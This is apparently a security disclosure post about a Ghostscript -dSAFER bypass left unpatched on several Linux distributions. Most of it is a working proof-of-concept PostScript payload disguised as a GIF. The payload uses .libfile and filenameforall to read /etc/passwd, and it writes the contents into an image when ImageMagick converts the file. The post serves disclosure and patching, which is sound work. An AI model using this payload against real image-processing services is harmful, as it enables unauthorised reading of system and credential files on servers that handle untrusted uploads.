During a mailing list discussion I noticed that -dSAFER, a ghostscript parameter that is used when handling untrusted documents, was broken on RHEL, Debian and Ubuntu (maybe more).

Some more investigation revealed that the bug was already fixed upstream, but because they never allocated a CVE or informed distributions about the security impact many distributions didn't update.

This could result in arbitrary file disclosure on systems that process pdf, ps, use ImageMagick or graphicsmagick, etc. You can easily imagine other complicated attacks on non-automated system by modifying output based on file contents, etc, etc.

The bug is already public, just recording here for reference.

Use of ghostscript as a backend with -dSAFER is extremely common:

https://codesearch.debian.net/search?q=-dSAFER&perpkg=1

$ cat test.gif
%!PS
/Font /Helvetica-Bold findfont def
/FontSize 12 def
Font FontSize scalefont setfont

/dumpname {
    dup             % copy filename
    dup             % copy filename
    print           % print filename
    (\n) print      % print newlinea
    status          % stat filename
    {
        (stat succeeded\n) print
        ( ctime:) print
        64 string cvs print
        ( atime:) print
        64 string cvs print
        ( size:) print
        64 string cvs print
        ( blocks:) print
        64 string cvs print
        (\n) print
        (\n) print
    }{
        (unable to stat\n\n) print
    } ifelse
    .libfile        % open as library
    {
        (.libfile returned file\n\n) print
        64 string readstring
        pop         % discard result (should proably test)
        dup         % copy read string
        print       % write to stdout
        % write to output
        newpath 0 0 moveto show showpage
        (\n) print
    }{
        (.libfile returned string\n) print
        print
        (\n) print
    } ifelse
} def

(/etc/passwd) /dumpname load 256 string filenameforall
$ convert test.gif png:test.png
<creates a file called test.png containing first line of /etc/passwd>